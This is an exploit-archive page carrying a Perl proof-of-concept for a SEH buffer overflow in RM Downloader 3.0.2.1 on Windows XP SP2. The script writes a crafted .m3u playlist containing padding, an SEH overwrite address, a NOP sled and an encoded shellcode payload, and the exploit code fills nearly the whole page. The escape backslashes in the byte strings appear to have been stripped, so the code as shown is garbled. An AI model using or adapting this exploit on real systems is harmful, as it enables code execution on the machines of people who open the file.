RM Downloader .m3u BOF (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RM Downloader .m3u BOF (SEH)
# Published : 2010-01-19
# Author : Jacky
# Previous Title : Windows NT User Mode to Ring 0 Escalation Vulnerability
# Next Title : Audiotran v1.4.1 direct RET BOF

#!/usr/bin/perl -w
# Author: Jacky
# Version: 3.0.2.1
# Tested on: Windows XP SP2

#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
#Written by Jacky
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
#Ret Vulnerability , so i tried by SEH and Voila !
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!

my $file="RM.m3u";
my $junk="A"x35059;
my $nseh="xebx1ex90x90";
my $seh="x1FxEAx02x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
#address and it worked Perfectly ;-)
#This Address works too ::> 0x01DD1111
my $nops="x90"x25;
my $esp="xbfx1bxafxd9xd2x2bxc9xb1x24xdbxdaxd9x74x24xf4x5b".
"x31x7bx0ex83xebxfcx03x60xa5x3bx27x6ax51xffxc8x92".
"xa2x8bx8cxaex29xf7x0bxb6x2cxe7x9fx09x37x7cxc0xb5".
"x46x69xb6x3ex7cxe6x48xaex4cx38xd3x82x2bx78x90xdd".
"xf2xb3x54xe0x36xa8x93xd9xe2x0bx58x68xeexdfx3fxb6".
"xf1x34xd9x3dxfdx81xadx1exe2x14x59x2bx06x9cx9cxc0".
"xbexfexbax12x02xcfx02x7ex0fx70xb3xfbxcfx09xbfx88".
"x90xe5x34xfex0cx5bxc1x96x24x48xdfxedxb5x3exe0xf1".
"xb5xb5x89xcdxeaxf8xbfx4dx43x72xc7x0exabxffx68x78".
"xdcx8ax8dx27x74x13x73x5dx8ax74x73x86xf0x1bxe7x2b".
"xd9xbex8fxcex25";

my $junk2="A"x5000;
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;


open(INI,">$file");
print INI $payload;
print "[+]File Created Successfully!n";
print "[+]Done!n";
close(INI);